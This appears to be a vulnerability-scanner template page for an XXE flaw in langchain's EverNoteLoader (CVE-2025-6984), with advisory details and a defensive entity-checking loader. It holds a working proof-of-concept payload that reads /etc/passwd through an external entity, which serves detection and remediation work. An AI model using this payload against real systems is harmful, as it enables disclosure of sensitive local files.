
langchain-ai langchain - XML External Entity Injection

CVE-2025-6984
Early Release

Description

langchain-ai/langchain 0.3.63 contains an XML External Entity (XXE) injection caused by insecure XML parsing in EverNoteLoader, which uses etree.iterparse(), letting attackers disclose sensitive information. Exploitation requires a crafted malicious XML payload.

Severity

High

CVSS Score

7.5

Published Date

September 8, 2025

Template Author

nukunga

CVE-2025-6984.yaml
id: CVE-2025-6984

info:
  name: langchain-ai langchain - XML External Entity Injection
  author: nukunga
  severity: high
  description: |
    langchain-ai/langchain 0.3.63 contains an XML External Entity (XXE) injection caused by insecure XML parsing in EverNoteLoader using etree.iterparse(), letting attackers disclose sensitive information, exploit requires crafted malicious XML payload.
  impact: |
    Attackers can disclose sensitive local files, potentially exposing critical system information.
  remediation: |
    Update to the latest version that disables external entity references in XML parsing.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6984
    - https://huntr.com/bounties/a6b521cf-258c-41c0-9edb-d8ef976abb2a
    - https://github.com/langchain-ai/langchain-community/commit/e842452
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-6984
    cwe-id: CWE-200
  metadata:
    verified: true
  tags: cve,cve2025,langchain,xxe,intrusive,file-write

self-contained: true

code:
  - engine:
      - py
      - python3

    source: |
      import tempfile
      import os
      from langchain_community.document_loaders import EverNoteLoader

      if __name__ == "__main__":

          xxe_payload = '''<?xml version="1.0" ?>
      <!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
      <note>
          <content>&example;</content>
      </note>'''

          # Write payload to temporary file
          with tempfile.NamedTemporaryFile(mode='w', suffix='.xml', delete=False) as f:
              f.write(xxe_payload)
              temp_file = f.name

          try:
              loader = EverNoteLoader(temp_file)
              print(loader.load())
          finally:
              os.unlink(temp_file)

    matchers:
      - type: word
        part: response
        words:
          - "root:"
          - "bin:"
          - "daemon:"
        condition: or
# digest: 4a0a004730450221009c621ac8672a85b22b22fa03298782b22e802b47f9509cd1de9bfcb26c254142022017b1de714ab947076ada80bc1664dabc6457aaba2470c4d079ceb45ece34d97a:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID: CVE-2025-6984
CWE ID: CWE-200

References

https://nvd.nist.gov/vuln/detail/CVE-2025-6984
https://huntr.com/bounties/a6b521cf-258c-41c0-9edb-d8ef976abb2a
https://github.com/langchain-ai/langchain-community/commit/e842452

Remediation Steps

Update to the latest version that disables external entity references in XML parsing.
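The defensive pattern the remediation describes, as an added example that is not langchain's own fix: a note loader that scans the DTD for external (SYSTEM/PUBLIC) entity declarations and refuses the document before any entity could be resolved, then streams <content> elements with iterparse. It uses the standard-library expat and ElementTree instead of lxml (an assumption made so it runs without extra packages); with lxml the equivalent hardening is passing resolve_entities=False to the parser.

```python
import io
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET


class ExternalEntityError(ValueError):
    """Raised when a note declares an external (SYSTEM/PUBLIC) entity."""


def find_external_entities(xml_bytes: bytes) -> list:
    """Return (entity_name, system_id) for every external entity declared in the DTD.

    expat is used purely as a scanner here: it fetches nothing, and the
    ExternalEntityRefHandler refuses every reference by returning 0.
    """
    found = []
    parser = expat.ParserCreate()

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities carry a literal value; external ones carry an identifier.
        if system_id is not None or public_id is not None:
            found.append((name, system_id))

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = lambda *args: 0  # never resolve, abort instead
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError:
        pass  # declarations were already reported before parsing was cut short
    return found


def load_note_content(xml_bytes: bytes) -> list:
    """Gate the document, then stream <content> text the way an ENEX reader would."""
    external = find_external_entities(xml_bytes)
    if external:
        raise ExternalEntityError(f"refusing to parse, external entities declared: {external}")
    contents = []
    for _event, elem in ET.iterparse(io.BytesIO(xml_bytes), events=("end",)):
        if elem.tag == "content":
            contents.append(elem.text or "")
    return contents


# Constructed samples: the payload shape from the template above, and a benign note.
XXE_SAMPLE = b"""<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<note><content>&example;</content></note>"""
BENIGN_SAMPLE = b"<note><content>hello</content></note>"

if __name__ == "__main__":
    print(load_note_content(BENIGN_SAMPLE))   # ['hello']
    print(find_external_entities(XXE_SAMPLE))  # [('example', '/etc/passwd')]
```

Real ENEX exports carry a DOCTYPE pointing at Evernote's DTD; expat does not fetch that external subset by default, so the gate trips only on entity declarations written into the document itself.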